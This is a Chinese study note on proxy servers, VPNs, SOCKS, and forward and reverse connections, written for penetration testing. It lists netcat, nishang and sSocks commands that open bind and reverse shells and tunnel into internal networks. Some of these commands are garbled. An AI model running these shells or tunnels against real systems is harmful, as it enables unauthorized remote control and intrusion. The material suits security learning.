代理服务器的学习

2023-05-16

一、代理服务器和VPN

1.工作原理

(1)代理的工作原理是:

由代理服务器自己去访问你的目标网站,并加载它的内容,然后再把这些加载过的内容传递到你的窗口上。这样就相当于你在浏览目标网站了。因此代理经常被叫做“梯子”或者“桥”。

(2)VPN的工作原理:

你传输的数据由VPN软件加密并传递给VPN服务器,这样传输的数据对截获者来说是不可读的(隧道技术)。
注:两者之间的主要区别在于,代理是为基本功能而设计的,例如绕过地理限制,但它们并不那么安全。 另一方面,VPN 加密和保护所有数据。 虽然 VPN 与代理不同,但它们可以一起使用以增强匿名性。

2.代理服务器类型

(1HTTP代理

能够代理客户机的HTTP访问,我们在浏览网页,下载数据时就是用http代理。

(2HTTPS代理

HTTPS协议就是SSL+HTTP协议建立的,可以对传输过程加密的网络协议,比HTTP协议传输文件更加安全。HTTPS和SSL支持使用X.509数字认证,如果需要的话用户可以确认发送者是谁。

(3SOCKS代理

采用SOCKS协议的代理服务器就是SOCKS服务器,是一种通用的代理服务器。
Socks全能代理,其标准端口为1080,支持多种协议,包括http、ftp请求及其它类型的请求。Socks 代理与应用层代理、 HTTP 层代理不同,Socks代理只是简单地传递数据包,而不必关心是何种应用协议,所以它更快更简便。如果您在企业网或校园网上,需要透过防火墙或通过代理服务器访问Internet就可能需要使用SOCKS。它分socks 4 和socks 5两种类型。这是一种通用的代理服务器,在网络通信中扮演着一个请求代理人的角色。在内网渗透中,通过搭建sOCKS代理,可以与目标内网主机进行通信,避免多次使用端口转发。
SOCKS4:只支持TCP协议(即传输控制协议)
SOCKS5:既支持TCP协议又支持UDP协议(即用户数据包协议)

3.代理方式

1.全局代理:

电脑上的大部分网络请求都要经过魔法上网的工具

2.规则代理(PAC):

这个模式是根据PAC文件,来判断请求是否要经过代理。

3.直连代理:

单独设置某个程序的代理信息与代理服务器直连。

4.实现工具以及命令

首先学会以攻击者思维考虑正反向连接。

正向连接:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mKGaQzNz-1675817834028)(https://secure2.wostatic.cn/static/K2g5885tiP3UQMG6MRzbb/%E5%9B%BE%E7%89%87.png?auth_key=1673872927-kzdiK19Ph9FcrBwe1RvX1N-0-d25d1e4a1102504e9a7e9e0fc811322d#id=sOtUv&originHeight=355&originWidth=1325&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=stroke&title=)]

正向连接就是受控端主机(目标机)监听一个端口,由控制端主机(攻击机)主动去连接受控端主机的过程,适用于受控主机(目标机)具有公网IP的情况下。Attacker和 Victim主机都具有公网IP,Attacker可以直接通过IP地址访问到Victim,所以能够使用正向连接来控制Victim。
反向连接:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sLHzdUPb-1675817834029)(https://secure2.wostatic.cn/static/fJa3DgK38vgG7NQaAaTN3u/%E5%9B%BE%E7%89%87.png?auth_key=1673872927-7EGRSRMLTfe2fBzQ5wUH5q-0-3eca549e282fb758c2f26c3f050f0a47#id=efFcx&originHeight=361&originWidth=944&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=stroke&title=)]

(攻击机)监听一个端口,由受控端主机(目标机)反向去连接控制端主机的过程,适用于受控端主机(目标机)没有公网IP的情况。Victim是一台位于内网,并且没有公网IP的主机,Attacker无法直接通过IP地址访问到Victim。所以此时需要在Attacker上监听一个端口,让Victim去反向连接Attacker,从而实现对Victim 的控制
在渗透测试中,正向连接往往受限于受控主机上的防火墙屏蔽及权限不足等情况,而反向连接可以很好地突破这些限制。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qFP3jzVT-1675817834030)(https://secure2.wostatic.cn/static/5xJ8QXerNEsdqDzooqfAH8/%E5%9B%BE%E7%89%87.png?auth_key=1673872927-tQnYjjQSPXr9tS3vEiXdyr-0-910a381425e9f6e2d45ec012a00b924e#id=z0VXc&originHeight=722&originWidth=1575&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=stroke&title=)]

1.工具名:Netcat

简介:
一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。透过使用TCP或UDP协议的网络连接去读写数据。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接。支持的代理协议有”4”(SOCKS v.4),”5”(SOCKS v.5),”connect”(HTTPS proxy).默认使用SOCKS v.5。
常用命令:

(1)正向连接:

目标机监听(/bin/sh可理解为/bin/bash的软连接):nc lvvp [port] -e /bin/sh
攻击机用nc连接:nc [ip] [port]

(2)反向连接:

攻击机监听:nc -lvvp [port]
目标及反弹shell:nc -t -e c:winntsystem32cmd.exe [ip] [port]

2.工具名:nishang

简介:
Nishang是一款针对PowerShell的渗透工具。nishang的使用是要在PowerShell 3.0以上的环境中才可以正常使用。(可以使用Get-Host命令来查看powershell当前的版本)Invoke-PowerShellUdp Powershell交互式正向连接或反向连接shell,基于UDP协议。此外Invoke-PoshRatHttp and Invoke-PoshRatHttps是Powershell交互式反向连接shell,基于HTTP协议和HTTPS协议。(不演示)
常用命令:

(1)正向连接(基于UDP,nc命令要修改):

目标机用nishang工具监听:Invoke-PowerShellUdp -blind -port 86
攻击机用nc进行连接:nc -nvu 192.168.190.159 86
攻击机进入powershell的nishang界面

(2)反向连接

攻击机监听:nc -lup 86
目标机反弹shell:Invoke-PowerShelludp -Reverse -IPADDress [ip] -port 86

3.工具名:reGeorg

工具地址:https://github.com/sensepost/reGeorg
简介:
reGeorg 是 reDuh 的升级版,主要是把内网服务器的端口通过 http/https 隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用 webshell 建立一个 socks 代理进行内网穿透,服务器必须支持 aspx、php 或 jsp 这些 web 程序中的一种。

4.工具名:sSocks

工具地址:http://sourceforge.net/projects/ssocks/
简介:
sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,其最新版为0.0.14下载解压后,执行命令编译。
./configure && make
进入src目录,会发现有nsocks、ssocksd、ssocks、rcsocks,其功能说明介绍如下:
nsocks 类似通过Socks5代理后的netcat,可用来测试socks server ssocksd 用来开启Socks5代理服务 ssocks 本地启用Socks5服务,并反弹到另一IP地址 rcsocks 接收反弹过来的Socks5服务,并转向另一端口
公网主机上执行:
./rcsocks -l 4444 -p 5555 -vv
内网主机上执行:
./rssocks –vv –s 公网主机ip:5555
这时本地主机可以通过访问公网主机的 4444 端口访问内网主机。

5.frp

工具地址:https://github.com/fatedier/frp/releases
frp 是⼀个开源、简洁易用、高性能的内网穿透和反向代理软件,支持tcp, udp, http, https等协议。
frp实验:frp

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

代理服务器的学习 的相关文章

  • Git小乌龟(TortoiseGit)使用详情

    项目可能大概也许maybe要用到Git小乌龟 xff0c 正好水篇文章 下载及安装 首先没有下载Git的先下载 xff0c 官网下载地址 xff0c 安装时直接一直next就行 然后是小乌龟的下载 xff0c 官网下载地址 xff0c 不知
  • 一张图阐述UML状态图的画法【软件工程】

    文章目录 I 介绍状态图II 一图搞定状态图画法 I 介绍状态图 状态图展示了一个特定对象的所有可能状态以及由于各种事件的发生而引起的状态间的转移 它有两大特征 xff1a 1 所有的变化都是针对某一个特定的对象 xff0c 这个对象会触发
  • 虚拟机中Ubuntu与主机共享文件夹

    虚拟机中Ubuntu与主机共享文件夹 xff0c 以及 mnt目录为空 xff0c 没有共享文件夹时的解决方案 1 启用共享文件夹 首先将虚拟机关机 xff0c 在虚拟机设置中 xff0c 选择选项面板 xff0c 选择共享文件夹 xff0
  • 【ROS】中级操作学习整理-TF坐标变换

    系列文章目录 ROS 中级操作学习整理 gazebo机器人仿真 ROS 中级操作学习整理 TF坐标变换 ROS 中级操作学习整理 传感器建模 ROS 中级操作学习整理 激光SLAM 文章目录 目录 目录 系列文章目录 文章目录 前言 一 R
  • STM32 芯片锁死无法烧录问题解决

    芯片锁死原因 xff1a 1 烧进去的工程对应器件与目标器件不一致 xff1b 2 烧进去的工程HSE VALUE与目标板上晶振频率不一致 xff1b 3 将烧录引脚烧录 本人在使用F411时犯下了 比较愚蠢的错误 xff0c 因为PB3引
  • 【TPMS】 - 发射端2

    TPMS项目 发射端SP370 目录章节介绍 一 SP370数据手册浏览二 源码学习三 SP370的RF的部分详解四 RF数据包的发送和数据包格式解析1 目录 章节介绍 1 SP370数据手册浏览 浏览SP370的数据手册 xff0c 看一
  • 【TPMS】 -接收端1

    TPMS项目 接受端TDA5235 目录章节介绍 一 TPMS接收板概况介绍二 TDA5235的专业知识1三 寄存器配置工具 目录 章节介绍 1 TPMS接收板概况介绍 本节开始接收板部分的课程 xff0c 先对接收板的整体情况 xff0c
  • ST_link突然不能使用了

    一 发现问题 今天 xff0c 我使用st link烧写程序时突然不能用了 xff0c 我昨天都还可以正常使用 我用手摸仿真器时很热 我意识到可能坏了 二 解决过程 xff08 1 xff09 用keil5查看debug设置时就能找到ST
  • OpenCV 读取视频并保存为另一个视频

    测试代码如下 xff1a 功能 xff1a 读取视频 xff0c 缩小处理后再存为另一个视频 方法1 include lt opencv2 opencv hpp gt include lt opencv2 highgui highgui c
  • XML和JSON

    XML 简介 xml是什么 XML是一种可扩展标记语言 Extensible Markup Language xff0c 它是一种用于在计算机网络上进行数据传输的标准格式 XML使用标记来标识数据 xff0c 并且可以自定义标记 xff0c
  • STM32单片机蜂鸣器实验

    蜂鸣器可以分为两种 xff1a 有源蜂鸣器与无源蜂鸣器 xff0c 这里的 源 指的是有没有自带震荡电路 xff0c 有源的蜂鸣器自带有震荡电路 xff0c 通电的瞬间就会发出声音 xff1b 而无源的蜂鸣器 xff0c 需要提供一个2 5
  • JVM虚拟机

    JVM 1 JVM 概述 x1f6b4 x1f6b4 x1f6b2 x1f6b4 虚拟机 xff08 Virtual Machine xff09 是一台虚拟的计算机 VMware属于系统虚拟机 xff0c 是对物理计算机的仿真 Java虚拟
  • 树莓派桌面WIFI图标消失,树莓派黑屏can‘t currently show the desktop

    方法一 xff1a 重装镜像 方法二 xff1a 找个树莓派显示器终端输入这行代码 sudo apt install wpasupplicant wpagui libengine pkcs11 openssl 转载B站视频 xff1a 完美
  • cuda10.1+cudnn10.1+tensorflow2.2.0+pytorch1.7.1下载安装及配置

    一 cuda及cudnn下载 1 查看自己电脑是否支持GPU 方法 xff1a 鼠标移动到此电脑 xff0c 点击鼠标右键 xff0c 依次选择属性 设备管理器 显示适配器有以下图标 xff08 NVIDIA xff09 即可安装GPU x
  • C语言:strtok()函数简单用法

    strtok函数 切割字符串 第一个参数指定一个字符串 xff0c 它包含了0个或者多个由第二个参数 xff08 字符串 xff09 中的一个或多个分隔符分割的标记 strtok函数找到第一个参数中的下一个标记 xff0c 并将其用 39
  • ESP32之FreeRTOS--任务的创建和运行

    文章目录 前言一 创建任务和删除函数1 xTaskCreate 2 xTaskCreateStatic 3 xTaskCreateRestricted 4 vTaskDelete 二 任务函数和任务控制块TCB1 任务函数模板2 TCB 三
  • 如何将本地项目上传到gitee

    如何将本地项目上传到gitee 第一步 xff1a 首先你要有一个gitee仓库 新建仓库 填写仓库信息 xff1a 如图 第二步 xff1a 将创建好的仓库 xff0c pull xff08 拉取 xff09 到本地 通过git 命令 把
  • go语言操作es

    目录 go语言操作es解决golang使用elastic连接elasticsearch时自动转换连接地址初始化数据创建结构体方式字符串方式 xff1a 查找修改删除查找 集群搭建配置文件修改 go语言操作es go get github c
  • Context介绍

    目录 Context设计原理默认上下文取消信号传值方法小结 Context 上下文 context Context Go 语言中用来设置截止日期 同步信号 xff0c 传递请求相关值的结构体 上下文与 Goroutine 有比较密切的关系

随机推荐

  • 将视频转成ROS的bag包

    执行转化命令 python2 mp4 2 bag py lane video3 mp4 out camera bag 循环播放图片 xff0c 并重命名成自己需要的话题名 rosbag play l out camera bag camer
  • beego介绍(一)

    目录 beego 的 MVC 架构介绍参数配置默认配置解析不同级别的配置多个配置文件支持环境变量配置系统默认参数基础配置App 配置Web配置监听配置Session配置Log配置 路由设置基础路由基本 GET 路由基本 POST 路由注册一
  • TCP如何保证可靠性?

    TCP如何保证可靠性 xff1f TCP协议保证数据传输可靠性的方式主要有 xff1a 校验和 序列号 确认应答 超时重传 连接管理 流量控制 拥塞控制 1 校验和 计算方式 xff1a 在数据传输的过程中 xff0c 将发送的数据段都当做
  • 仿照java的jdk动态代理实现go语言动态代理

    仿照java的jdk动态代理实现go语言动态代理 通过学习java的jdk动态代理和Cglib动态代理 xff0c 仿照jdk动态代理用go实现了一个简单的动态代理 结构型模式 代理模式 代理模式中分为静态代理和动态代理 静态代理需要在编译
  • golang设计模式——装饰器模式

    装饰器模式 装饰器模式 xff1a 动态地给一个对象添加一些额外的职责 xff0c 就增加功能来说 xff0c 装饰模式比生成子类更为灵活 UML类图 xff1a 分析 首先我们需要理解 xff0c 为什么组合优于继承 xff1f 继承有诸
  • GoLang之unsafe分析

    GoLang之unsafe 目录 GoLang之unsafe1 前言2 指针类型转换3 指针运算4 获取大小和偏移5 关于string 1 前言 开发中 xff0c byte类型和string类型需要互相转换的场景并不少见 xff0c 直接
  • Go实现分布式锁

    Go分布式锁 目录 Go分布式锁进程内加锁trylock基于 redis 的 setnx基于 zk基于 etcdredlock如何选择 在单机程序并发或并行修改全局变量时 xff0c 需要对修改行为加锁以创造临界区 为什么需要加锁呢 xff
  • Golang实习蓝湖二面

    蓝湖二面 自我介绍 问题 casbin的策略 ACL RBAB ABAC 他们的区别和应用 JWT的实现 JWT和传统的token有什么区别 三次握手和四次挥手 time wait 为什么需要等待2MSL 什么是完全二叉树 完全二叉树有什么
  • export、import、commit、save、load的区别

    目录 1 docker export 和 docker import2 docker commit3 docker save 和 docker load 1 docker export 和 docker import docker expo
  • docker搭建redis集群模式

    目录 docker 安装redis1 创建redis conf开启redis验证 开启密码 允许redis外地连接后台启动开启redis持久化 2 启动redis容器3 进入容器 redis集群3主3从1 新建6个redis容器2 构建主从
  • SONiC+P4实践——P4Runtime下发ACL表项

    转载请表明出处 注 xff1a SONiC系统为vs版本 Part1 xff1a 实现外部宿主机与SONiC的网络连通 步骤 1 xff1a 打开一个ubuntu系统安装kvm及其依赖 xff08 1 xff09 查看CPU是否支持虚拟化
  • BDD100K自动驾驶数据集格式转YOLO格式

    说明 xff1a 为了用BDD100K数据集训练YOLOV5模型 xff0c 首先需要将BDD100K数据集格式转成YOLOV5支持的输入格式 转换代码如下 xff1a 一 BDD100K转YOLO格式 usr bin env python
  • 全局代理-WINDOWS怎么设置全局代理?

    https blog 51cto com u 15275599 2923545 WINDOWS设置全局代理可以通过以下4个步骤操作来实现 xff1a 1 点击开始菜单 xff0c 然后点击setting xff08 设置 xff09 xff
  • Easyexcle导入导出

    一 导入 1 依赖 lt excel gt lt dependency gt lt groupId gt com alibaba lt groupId gt lt artifactId gt easyexcel lt artifactId
  • Springboot+(linux)redis哨兵模式实现

    下面是主从redis服务 6379主6380从16381从2 下面是多个哨兵 26379哨兵126380哨兵226381哨兵3 windows下redis压缩包 xff08 本文使用的是5 0 13 xff09 Redis xff08 点我
  • 记一次springboot2.1.6配置(mysql)多数据源

    pom xml lt xml version 61 34 1 0 34 encoding 61 34 UTF 8 34 gt lt project xmlns 61 34 http maven apache org POM 4 0 0 34
  • 小车跟随行驶系统(基于MSP-EXP430F5529LP系统板)

    选用材料 xff1a 主控板MSP EXP430F5529LP 陀螺仪 直流减速电机 xff08 可以选用光电编码器 xff0c 霍尔电机不好调节PID xff09 TB6612电机驱动 超声波测距模块 灰度传感器 无线透传 蓝牙模块 xf
  • 使用sheetjs读取excle表格

    span class token comment cdn引入js span span class token operator lt span script lang span class token operator 61 span sp
  • js的六种继承方式

    1 原型链继承 核心 xff1a 将父类的实例作为子类的原型 span class token keyword function span span class token function Parent1 span span class
  • 代理服务器的学习

    一 代理服务器和VPN 1 工作原理 xff08 1 xff09 代理的工作原理是 xff1a 由代理服务器自己去访问你的目标网站 xff0c 并加载它的内容 xff0c 然后再把这些加载过的内容传递到你的窗口上 这样就相当于你在浏览目标网